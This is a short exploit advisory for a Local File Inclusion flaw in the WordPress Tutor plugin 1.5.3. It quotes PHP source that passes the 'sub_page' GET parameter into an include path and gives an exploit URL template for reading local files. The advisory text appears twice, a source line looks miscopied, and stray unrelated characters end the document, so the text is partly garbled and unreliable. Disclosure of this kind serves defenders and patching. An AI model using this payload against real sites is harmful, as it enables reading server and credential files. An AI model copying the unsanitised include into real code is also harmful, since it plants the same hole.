#Tile: WordPress Plugin tutor.1.5.3 - Local File Inclusion #Author: mehran feizi #Category: webapps #Date: 2020-02-12 #vendor home page: https://wordpress.org/plugins/tutor/ =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] ================================================================================= contact me: telegram: @MF0584 gmail: mehranfeizi13841384@gmail.com =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] =================================================================================
体验盒子
